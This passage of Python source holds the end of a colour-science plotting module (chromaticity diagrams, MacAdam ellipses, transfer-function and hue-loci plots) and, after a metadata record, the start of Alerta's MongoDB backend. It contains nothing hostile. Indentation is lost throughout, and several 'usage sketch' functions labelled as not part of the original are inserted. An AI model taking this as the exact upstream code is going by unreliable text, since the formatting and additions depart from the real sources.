>>> plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS(
... RGB, "ITU-R BT.709"
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram_CIE1960UCS.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram_CIE1960UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1960 UCS"})
return plot_RGB_chromaticities_in_chromaticity_diagram(
RGB,
colourspace,
chromaticity_diagram_callable_CIE1960UCS,
scatter_kwargs=scatter_kwargs,
**settings,
)
@override_style()
def plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS(
RGB: ArrayLike,
colourspace: RGB_Colourspace
| str
| Sequence[RGB_Colourspace | str] = "sRGB",
chromaticity_diagram_callable_CIE1976UCS: Callable = (
plot_RGB_colourspaces_in_chromaticity_diagram_CIE1976UCS
),
scatter_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given *RGB* colourspace array in the
*CIE 1976 UCS Chromaticity Diagram*.
Parameters
----------
RGB
*RGB* colourspace array.
colourspace
*RGB* colourspace of the *RGB* array. ``colourspace`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_RGB_colourspaces` definition.
chromaticity_diagram_callable_CIE1976UCS
Callable responsible for drawing the
*CIE 1976 UCS Chromaticity Diagram*.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
- ``apply_cctf_encoding`` : If ``apply_cctf_encoding`` is set to
*False*, the encoding colour component transfer function /
opto-electronic transfer function is not applied when encoding the
samples to the plotting space.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_RGB_colourspaces_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> RGB = np.random.random((128, 128, 3))
>>> plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS(
... RGB, "ITU-R BT.709"
... )
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_\
Plot_RGB_Chromaticities_In_Chromaticity_Diagram_CIE1976UCS.png
:align: center
:alt: plot_RGB_chromaticities_in_chromaticity_diagram_CIE1976UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1976 UCS"})
return plot_RGB_chromaticities_in_chromaticity_diagram(
RGB,
colourspace,
chromaticity_diagram_callable_CIE1976UCS,
scatter_kwargs=scatter_kwargs,
**settings,
)
def ellipses_MacAdam1942(
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931"
) -> List[NDArrayFloat]:
"""
Return *MacAdam (1942) Ellipses (Observer PGN)* coefficients according to
given method.
Parameters
----------
method
Computation method.
Returns
-------
:class:`list`
*MacAdam (1942) Ellipses (Observer PGN)* coefficients.
Examples
--------
>>> ellipses_MacAdam1942()[0] # doctest: +SKIP
array([ 1.60000000e-01, 5.70000000e-02, 5.00000023e-03,
1.56666660e-02, -2.77000015e+01])
"""
method = validate_method(
method, ("CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS")
)
if method == "cie 1931":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy
elif method == "cie 1960 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_UCS_uv(xy)
elif method == "cie 1976 ucs":
def xy_to_ij(xy: NDArrayFloat) -> NDArrayFloat:
"""
Convert given *CIE xy* chromaticity coordinates to *ij*
chromaticity coordinates.
"""
return xy_to_Luv_uv(xy)
x, y, _a, _b, _theta, a, b, theta = tsplit(DATA_MACADAM_1942_ELLIPSES)
ellipses_coefficients = []
for i in range(len(theta)):
xy = point_at_angle_on_ellipse(
np.linspace(0, 360, 36),
[x[i], y[i], a[i] / 60, b[i] / 60, theta[i]],
)
ij = xy_to_ij(xy)
ellipses_coefficients.append(
ellipse_coefficients_canonical_form(ellipse_fitting(ij))
)
return ellipses_coefficients
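# Hedged usage sketch (not part of the original module): the coefficients can be
# computed for any of the three diagrams by switching "method"; each entry
# describes one MacAdam ellipse (centre, axes and orientation) as consumed by
# "plot_ellipses_MacAdam1942_in_chromaticity_diagram" below.
def _example_ellipses_MacAdam1942() -> None:  # pragma: no cover
    coefficients = ellipses_MacAdam1942(method="CIE 1976 UCS")
    print(len(coefficients))  # one coefficient set per ellipse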
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable: Callable = plot_chromaticity_diagram,
method: Literal["CIE 1931", "CIE 1960 UCS", "CIE 1976 UCS"]
| str = "CIE 1931",
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*Chromaticity Diagram* according to given method.
Parameters
----------
chromaticity_diagram_callable
Callable responsible for drawing the *Chromaticity Diagram*.
method
*Chromaticity Diagram* method.
chromaticity_diagram_clipping
Whether to clip the *Chromaticity Diagram* colours with the ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
        be either a single dictionary applied to all the ellipses with the same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram
"""
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
settings = dict(kwargs)
settings.update({"axes": axes, "show": False})
ellipses_coefficients = ellipses_MacAdam1942(method=method)
if chromaticity_diagram_clipping:
diagram_clipping_path_x = []
diagram_clipping_path_y = []
for coefficients in ellipses_coefficients:
coefficients = np.copy(coefficients) # noqa: PLW2901
coefficients[2:4] /= 2
x, y = tsplit(
point_at_angle_on_ellipse(
np.linspace(0, 360, 36),
coefficients,
)
)
diagram_clipping_path_x.append(x)
diagram_clipping_path_y.append(y)
diagram_clipping_path = np.rollaxis(
np.array([diagram_clipping_path_x, diagram_clipping_path_y]), 0, 3
)
diagram_clipping_path = Path.make_compound_path_from_polys(
diagram_clipping_path
).vertices
settings.update({"diagram_clipping_path": diagram_clipping_path})
chromaticity_diagram_callable(**settings)
ellipse_settings_collection = [
{
"color": CONSTANTS_COLOUR_STYLE.colour.cycle[4],
"alpha": 0.4,
"linewidth": colour_style()["lines.linewidth"],
"zorder": CONSTANTS_COLOUR_STYLE.zorder.midground_polygon,
}
for _ellipses_coefficient in ellipses_coefficients
]
if ellipse_kwargs is not None:
update_settings_collection(
ellipse_settings_collection,
ellipse_kwargs,
len(ellipses_coefficients),
)
for i, coefficients in enumerate(ellipses_coefficients):
x_c, y_c, a_a, a_b, theta_e = coefficients
ellipse = Ellipse(
(x_c, y_c),
a_a,
a_b,
angle=theta_e,
**ellipse_settings_collection[i],
)
axes.add_artist(ellipse)
settings.update({"show": True})
settings.update(kwargs)
return render(**settings)
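# Hedged usage sketch (not part of the original module): demonstrates clipping
# the diagram colours to the ellipses and overriding the ellipse styling; the
# keyword values are illustrative.
def _example_plot_MacAdam1942_ellipses() -> None:  # pragma: no cover
    plot_ellipses_MacAdam1942_in_chromaticity_diagram(
        chromaticity_diagram_clipping=True,
        ellipse_kwargs={"color": "k", "alpha": 0.25},
    )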
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931(
chromaticity_diagram_callable_CIE1931: Callable = (
plot_chromaticity_diagram_CIE1931
),
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*CIE 1931 Chromaticity Diagram*.
Parameters
----------
chromaticity_diagram_callable_CIE1931
Callable responsible for drawing the *CIE 1931 Chromaticity Diagram*.
chromaticity_diagram_clipping
Whether to clip the *CIE 1931 Chromaticity Diagram* colours with the
ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
        be either a single dictionary applied to all the ellipses with the same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram_CIE1931.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1931
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1931"})
return plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable_CIE1931,
chromaticity_diagram_clipping=chromaticity_diagram_clipping,
ellipse_kwargs=ellipse_kwargs,
**settings,
)
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS(
chromaticity_diagram_callable_CIE1960UCS: Callable = (
plot_chromaticity_diagram_CIE1960UCS
),
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*CIE 1960 UCS Chromaticity Diagram*.
Parameters
----------
chromaticity_diagram_callable_CIE1960UCS
Callable responsible for drawing the
*CIE 1960 UCS Chromaticity Diagram*.
chromaticity_diagram_clipping
Whether to clip the *CIE 1960 UCS Chromaticity Diagram* colours with
the ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
        be either a single dictionary applied to all the ellipses with the same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram_CIE1960UCS.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1960UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1960 UCS"})
return plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable_CIE1960UCS,
chromaticity_diagram_clipping=chromaticity_diagram_clipping,
ellipse_kwargs=ellipse_kwargs,
**settings,
)
@override_style()
def plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS(
chromaticity_diagram_callable_CIE1976UCS: Callable = (
plot_chromaticity_diagram_CIE1976UCS
),
chromaticity_diagram_clipping: bool = False,
ellipse_kwargs: dict | List[dict] | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot *MacAdam (1942) Ellipses (Observer PGN)* in the
*CIE 1976 UCS Chromaticity Diagram*.
Parameters
----------
chromaticity_diagram_callable_CIE1976UCS
Callable responsible for drawing the
*CIE 1976 UCS Chromaticity Diagram*.
chromaticity_diagram_clipping
Whether to clip the *CIE 1976 UCS Chromaticity Diagram* colours with
the ellipses.
ellipse_kwargs
Parameters for the :class:`Ellipse` class, ``ellipse_kwargs`` can
        be either a single dictionary applied to all the ellipses with the same
settings or a sequence of dictionaries with different settings for each
ellipse.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.diagrams.plot_chromaticity_diagram`,
:func:`colour.plotting.models.\
plot_ellipses_MacAdam1942_in_chromaticity_diagram`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS()
... # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/\
Plotting_Plot_Ellipses_MacAdam1942_In_Chromaticity_Diagram_CIE1976UCS.png
:align: center
:alt: plot_ellipses_MacAdam1942_in_chromaticity_diagram_CIE1976UCS
"""
settings = dict(kwargs)
settings.update({"method": "CIE 1976 UCS"})
return plot_ellipses_MacAdam1942_in_chromaticity_diagram(
chromaticity_diagram_callable_CIE1976UCS,
chromaticity_diagram_clipping=chromaticity_diagram_clipping,
ellipse_kwargs=ellipse_kwargs,
**settings,
)
@override_style()
def plot_single_cctf(
cctf: Callable | str, cctf_decoding: bool = False, **kwargs: Any
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given colourspace colour component transfer function.
Parameters
----------
cctf
        Colour component transfer function to plot. ``cctf`` can be of any
type or form supported by the
:func:`colour.plotting.common.filter_passthrough` definition.
cctf_decoding
Plot the decoding colour component transfer function instead.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_functions`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_single_cctf("ITU-R BT.709") # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Single_CCTF.png
:align: center
:alt: plot_single_cctf
"""
settings: Dict[str, Any] = {
"title": f"{cctf} - {'Decoding' if cctf_decoding else 'Encoding'} CCTF"
}
settings.update(kwargs)
return plot_multi_cctfs([cctf], cctf_decoding, **settings)
@override_style()
def plot_multi_cctfs(
cctfs: Callable | str | Sequence[Callable | str],
cctf_decoding: bool = False,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given colour component transfer functions.
Parameters
----------
cctfs
        Colour component transfer functions to plot. ``cctfs`` elements can be
of any type or form supported by the
:func:`colour.plotting.common.filter_passthrough` definition.
cctf_decoding
Plot the decoding colour component transfer function instead.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_functions`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
Examples
--------
>>> plot_multi_cctfs(["ITU-R BT.709", "sRGB"]) # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Multi_CCTFs.png
:align: center
:alt: plot_multi_cctfs
"""
cctfs_filtered = filter_passthrough(
CCTF_DECODINGS if cctf_decoding else CCTF_ENCODINGS, cctfs
)
mode = "Decoding" if cctf_decoding else "Encoding"
title = f"{', '.join(list(cctfs_filtered))} - {mode} CCTFs"
settings: Dict[str, Any] = {
"bounding_box": (0, 1, 0, 1),
"legend": True,
"title": title,
"x_label": "Signal Value" if cctf_decoding else "Tristimulus Value",
"y_label": "Tristimulus Value" if cctf_decoding else "Signal Value",
}
settings.update(kwargs)
with domain_range_scale("1"):
return plot_multi_functions(cctfs_filtered, **settings)
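# Hedged usage sketch (not part of the original module): compares encoding CCTFs
# and plots a single decoding CCTF; the transfer function names are standard
# Colour identifiers.
def _example_plot_cctfs() -> None:  # pragma: no cover
    plot_multi_cctfs(["ITU-R BT.709", "sRGB"], cctf_decoding=False)
    plot_single_cctf("sRGB", cctf_decoding=True)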
@override_style()
def plot_constant_hue_loci(
data: ArrayLike,
model: Literal[
"CAM02LCD",
"CAM02SCD",
"CAM02UCS",
"CAM16LCD",
"CAM16SCD",
"CAM16UCS",
"CIE XYZ",
"CIE xyY",
"CIE Lab",
"CIE Luv",
"CIE UCS",
"CIE UVW",
"DIN99",
"Hunter Lab",
"Hunter Rdab",
"ICaCb",
"ICtCp",
"IPT",
"IPT Ragoo 2021",
"IgPgTg",
"Jzazbz",
"OSA UCS",
"Oklab",
"hdr-CIELAB",
"hdr-IPT",
]
| str = "CIE Lab",
scatter_kwargs: dict | None = None,
convert_kwargs: dict | None = None,
**kwargs: Any,
) -> Tuple[plt.Figure, plt.Axes]:
"""
Plot given constant hue loci colour matches data such as that from
:cite:`Hung1995` or :cite:`Ebner1998` that are easily loaded with
`Colour - Datasets <https://github.com/colour-science/colour-datasets>`__.
Parameters
----------
data
Constant hue loci colour matches data expected to be an `ArrayLike` as
follows::
[
('name', XYZ_r, XYZ_cr, (XYZ_ct, XYZ_ct, XYZ_ct, ...), \
{metadata}),
('name', XYZ_r, XYZ_cr, (XYZ_ct, XYZ_ct, XYZ_ct, ...), \
{metadata}),
('name', XYZ_r, XYZ_cr, (XYZ_ct, XYZ_ct, XYZ_ct, ...), \
{metadata}),
...
]
where ``name`` is the hue angle or name, ``XYZ_r`` the *CIE XYZ*
tristimulus values of the reference illuminant, ``XYZ_cr`` the
*CIE XYZ* tristimulus values of the reference colour under the
reference illuminant, ``XYZ_ct`` the *CIE XYZ* tristimulus values of
the colour matches under the reference illuminant and ``metadata`` the
dataset metadata.
model
Colourspace model, see :attr:`colour.COLOURSPACE_MODELS` attribute for
the list of supported colourspace models.
scatter_kwargs
Keyword arguments for the :func:`matplotlib.pyplot.scatter` definition.
The following special keyword arguments can also be used:
- ``c`` : If ``c`` is set to *RGB*, the scatter will use the colours
as given by the ``RGB`` argument.
convert_kwargs
Keyword arguments for the :func:`colour.convert` definition.
Other Parameters
----------------
kwargs
{:func:`colour.plotting.artist`,
:func:`colour.plotting.plot_multi_functions`,
:func:`colour.plotting.render`},
See the documentation of the previously listed definitions.
Returns
-------
:class:`tuple`
Current figure and axes.
References
----------
:cite:`Ebner1998`, :cite:`Hung1995`, :cite:`Mansencal2019`
Examples
--------
>>> data = [
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.40920000, 0.28120000, 0.30600000]),
... np.array(
... [
... [0.02495100, 0.01908600, 0.02032900],
... [0.10944300, 0.06235900, 0.06788100],
... [0.27186500, 0.18418700, 0.19565300],
... [0.48898900, 0.40749400, 0.44854600],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.30760000, 0.48280000, 0.42770000]),
... np.array(
... [
... [0.02108000, 0.02989100, 0.02790400],
... [0.06194700, 0.11251000, 0.09334400],
... [0.15255800, 0.28123300, 0.23234900],
... [0.34157700, 0.56681300, 0.47035300],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.39530000, 0.28120000, 0.18450000]),
... np.array(
... [
... [0.02436400, 0.01908600, 0.01468800],
... [0.10331200, 0.06235900, 0.02854600],
... [0.26311900, 0.18418700, 0.12109700],
... [0.43158700, 0.40749400, 0.39008600],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.20510000, 0.18420000, 0.57130000]),
... np.array(
... [
... [0.03039800, 0.02989100, 0.06123300],
... [0.08870000, 0.08498400, 0.21843500],
... [0.18405800, 0.18418700, 0.40111400],
... [0.32550100, 0.34047200, 0.50296900],
... [0.53826100, 0.56681300, 0.80010400],
... ]
... ),
... None,
... ],
... [
... None,
... np.array([0.95010000, 1.00000000, 1.08810000]),
... np.array([0.35770000, 0.28120000, 0.11250000]),
... np.array(
... [
... [0.03678100, 0.02989100, 0.01481100],
... [0.17127700, 0.11251000, 0.01229900],
... [0.30080900, 0.28123300, 0.21229800],
... [0.52976000, 0.40749400, 0.11720000],
... ]
... ),
... None,
... ],
... ]
>>> plot_constant_hue_loci(data, "CIE Lab") # doctest: +ELLIPSIS
(<Figure size ... with 1 Axes>, <...Axes...>)
.. image:: ../_static/Plotting_Plot_Constant_Hue_Loci.png
:align: center
:alt: plot_constant_hue_loci
"""
# TODO: Filter appropriate colour models.
# NOTE: "dtype=object" is required for ragged array support
# in "Numpy" 1.24.0.
data = as_array(data, dtype=object) # pyright: ignore
settings: Dict[str, Any] = {"uniform": True}
settings.update(kwargs)
_figure, axes = artist(**settings)
scatter_settings = {
"s": 40,
"c": "RGB",
"marker": "o",
"alpha": 0.85,
"zorder": CONSTANTS_COLOUR_STYLE.zorder.foreground_scatter,
}
if scatter_kwargs is not None:
scatter_settings.update(scatter_kwargs)
convert_kwargs = optional(convert_kwargs, {})
use_RGB_colours = str(scatter_settings["c"]).upper() == "RGB"
colourspace = CONSTANTS_COLOUR_STYLE.colour.colourspace
for hue_data in data:
_name, XYZ_r, XYZ_cr, XYZ_ct, _metadata = hue_data
xy_r = XYZ_to_xy(XYZ_r)
convert_settings = {"illuminant": xy_r}
convert_settings.update(convert_kwargs)
ijk_ct = colourspace_model_axis_reorder(
convert(XYZ_ct, "CIE XYZ", model, **convert_settings), model
)
ijk_cr = colourspace_model_axis_reorder(
convert(XYZ_cr, "CIE XYZ", model, **convert_settings), model
)
ijk_ct *= COLOURSPACE_MODELS_DOMAIN_RANGE_SCALE_1_TO_REFERENCE[model]
ijk_cr *= COLOURSPACE_MODELS_DOMAIN_RANGE_SCALE_1_TO_REFERENCE[model]
def _linear_equation(
x: NDArrayFloat, a: NDArrayFloat, b: NDArrayFloat
) -> NDArrayFloat:
"""Define the canonical linear equation for a line."""
return a * x + b
popt, _pcov = scipy.optimize.curve_fit(
_linear_equation, ijk_ct[..., 0], ijk_ct[..., 1]
)
axes.plot(
ijk_ct[..., 0],
_linear_equation(ijk_ct[..., 0], *popt),
c=CONSTANTS_COLOUR_STYLE.colour.average,
zorder=CONSTANTS_COLOUR_STYLE.zorder.midground_line,
)
if use_RGB_colours:
RGB_ct = XYZ_to_RGB(
XYZ_ct, colourspace, xy_r, apply_cctf_encoding=True
)
scatter_settings["c"] = np.clip(RGB_ct, 0, 1)
RGB_cr = XYZ_to_RGB(
XYZ_cr, colourspace, xy_r, apply_cctf_encoding=True
)
RGB_cr = np.clip(np.ravel(RGB_cr), 0, 1)
else:
scatter_settings["c"] = CONSTANTS_COLOUR_STYLE.colour.dark
RGB_cr = CONSTANTS_COLOUR_STYLE.colour.dark
axes.scatter(ijk_ct[..., 0], ijk_ct[..., 1], **scatter_settings)
axes.plot(
ijk_cr[..., 0],
ijk_cr[..., 1],
"s",
c=RGB_cr,
markersize=CONSTANTS_COLOUR_STYLE.geometry.short * 8,
zorder=CONSTANTS_COLOUR_STYLE.zorder.midground_line,
)
labels = np.array(COLOURSPACE_MODELS_AXIS_LABELS[model])[
as_int_array(colourspace_model_axis_reorder([0, 1, 2], model))
]
settings = {
"axes": axes,
"title": f"Constant Hue Loci - {model}",
"x_label": labels[0],
"y_label": labels[1],
}
settings.update(kwargs)
return render(**settings)
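# Hedged usage sketch (not part of the original module): a single constant hue
# locus entry in the layout documented above, using the first record of the
# docstring example; the hue name is an illustrative label.
def _example_plot_constant_hue_loci() -> None:  # pragma: no cover
    data = [
        [
            "Hue 1",
            np.array([0.95010000, 1.00000000, 1.08810000]),  # XYZ_r
            np.array([0.40920000, 0.28120000, 0.30600000]),  # XYZ_cr
            np.array(
                [
                    [0.02495100, 0.01908600, 0.02032900],
                    [0.10944300, 0.06235900, 0.06788100],
                    [0.27186500, 0.18418700, 0.19565300],
                    [0.48898900, 0.40749400, 0.44854600],
                ]
            ),  # XYZ_ct
            None,  # metadata
        ],
    ]
    plot_constant_hue_loci(data, "CIE Lab")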
blob_id: 94d90bb541221f2bd4b82a7c2fe6c036e60ef410
directory_id: faf7ed9d56d408a261a69fcc9eb3b5f9c6e38873
path: /alerta/database/backends/mongodb/base.py
content_id: 2a4c71408e53a806bed4989c3667dcd758b13753
detected_licenses: ["Apache-2.0"]
license_type: permissive
repo_name: alerta/alerta
snapshot_id: 53eaf5e491da46a8faae37824eebd02e92b25dac
revision_id: 5b572c3aa9b086f02e366e3f8a2173174b0c5a87
branch_name: refs/heads/master
visit_date: 2023-08-19T19:21:55.272638
revision_date: 2023-06-30T08:38:25
committer_date: 2023-06-30T08:38:25
github_id: 3,877,327
star_events_count: 1,468
fork_events_count: 282
gha_license_id: Apache-2.0
gha_event_created_at: 2023-09-04T17:32:20
gha_created_at: 2012-03-30T14:19:34
gha_language: Python
src_encoding: UTF-8
language: Python
is_vendor: false
is_generated: false
length_bytes: 71,239
extension: py
filename: base.py
content:
from collections import defaultdict
from datetime import datetime, timedelta
from flask import current_app
from pymongo import ASCENDING, TEXT, MongoClient, ReturnDocument
from pymongo.errors import ConnectionFailure
from alerta.app import alarm_model
from alerta.database.base import Database
from alerta.exceptions import NoCustomerMatch
from alerta.models.enums import ADMIN_SCOPES
from alerta.models.heartbeat import HeartbeatStatus
from .utils import Query
# See https://github.com/MongoEngine/flask-mongoengine/blob/master/flask_mongoengine/__init__.py
# See https://github.com/dcrosta/flask-pymongo/blob/master/flask_pymongo/__init__.py
class Backend(Database):
def create_engine(self, app, uri, dbname=None, schema=None, raise_on_error=True):
self.uri = uri
self.dbname = dbname
db = self.connect()
try:
self._create_indexes(db)
except Exception as e:
if raise_on_error:
raise
app.logger.warning(e)
try:
self._update_lookups(db)
except Exception as e:
if raise_on_error:
raise
app.logger.warning(e)
def connect(self):
self.client = MongoClient(self.uri)
if self.dbname:
return self.client[self.dbname]
else:
return self.client.get_database()
@staticmethod
def _create_indexes(db):
db.alerts.create_index(
[('environment', ASCENDING), ('customer', ASCENDING), ('resource', ASCENDING), ('event', ASCENDING)],
unique=True
)
db.alerts.create_index([('$**', TEXT)])
db.customers.drop_indexes() # FIXME: should only drop customers index if it's unique (ie. the old one)
db.customers.create_index([('match', ASCENDING)])
db.heartbeats.create_index([('origin', ASCENDING), ('customer', ASCENDING)], unique=True)
db.keys.create_index([('key', ASCENDING)], unique=True)
db.perms.create_index([('match', ASCENDING)], unique=True)
db.users.drop_indexes()
db.users.create_index([('login', ASCENDING)], unique=True,
partialFilterExpression={'login': {'$type': 'string'}})
db.users.create_index([('email', ASCENDING)], unique=True,
partialFilterExpression={'email': {'$type': 'string'}})
db.groups.create_index([('name', ASCENDING)], unique=True)
db.metrics.create_index([('group', ASCENDING), ('name', ASCENDING)], unique=True)
@staticmethod
def _update_lookups(db):
for severity, code in alarm_model.Severity.items():
db.codes.update_one(
{'severity': severity},
{'$set': {'severity': severity, 'code': code}},
upsert=True
)
for status, state in alarm_model.Status.items():
db.states.update_one(
{'status': status},
{'$set': {'status': status, 'state': state}},
upsert=True
)
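    # Hedged note (not part of the original module): "codes" and "states" act as
    # small lookup collections keyed by severity/status; "get_alerts" below
    # $lookup-joins them onto each alert so results can be ordered by the
    # numeric severity code or status state.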
@property
def name(self):
return self.get_db().name
@property
def version(self):
return self.get_db().client.server_info()['version']
@property
def is_alive(self):
try:
self.get_db().client.admin.command('ismaster')
except ConnectionFailure:
return False
return True
def close(self, db):
self.client.close()
def destroy(self):
db = self.connect()
self.client.drop_database(db.name)
# ALERTS
def get_severity(self, alert):
"""
Get severity of correlated alert. Used to determine previous severity.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event,
'severity': {'$ne': alert.severity}
},
{
'event': {'$ne': alert.event},
'correlate': alert.event
}],
'customer': alert.customer
}
r = self.get_db().alerts.find_one(query, projection={'severity': 1, '_id': 0})
return r['severity'] if r else None
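    # Hedged note (not part of the original module): the $or above matches either
    # the same event at a different severity, or a different event that lists
    # this alert's event in its "correlate" field, i.e. a correlated alert.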
def get_status(self, alert):
"""
Get status of correlated or duplicate alert. Used to determine previous status.
"""
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event
},
{
'correlate': alert.event,
}
],
'customer': alert.customer
}
r = self.get_db().alerts.find_one(query, projection={'status': 1, '_id': 0})
return r['status'] if r else None
def is_duplicate(self, alert):
query = {
'environment': alert.environment,
'resource': alert.resource,
'event': alert.event,
'severity': alert.severity,
'customer': alert.customer
}
return self.get_db().alerts.find_one(query)
def is_correlated(self, alert):
query = {
'environment': alert.environment,
'resource': alert.resource,
'$or': [
{
'event': alert.event,
'severity': {'$ne': alert.severity}
},
{
'event': {'$ne': alert.event},
'correlate': alert.event
}],
'customer': alert.customer
}
return self.get_db().alerts.find_one(query)
def is_flapping(self, alert, window=1800, count=2):
"""
Return true if alert severity has changed more than X times in Y seconds
"""
pipeline = [
{'$match': {
'environment': alert.environment,
'resource': alert.resource,
'event': alert.event,
'customer': alert.customer
}},
{'$unwind': '$history'},
{'$match': {
'history.updateTime': {'$gt': datetime.utcnow() - timedelta(seconds=window)},
'history.type': 'severity'
}},
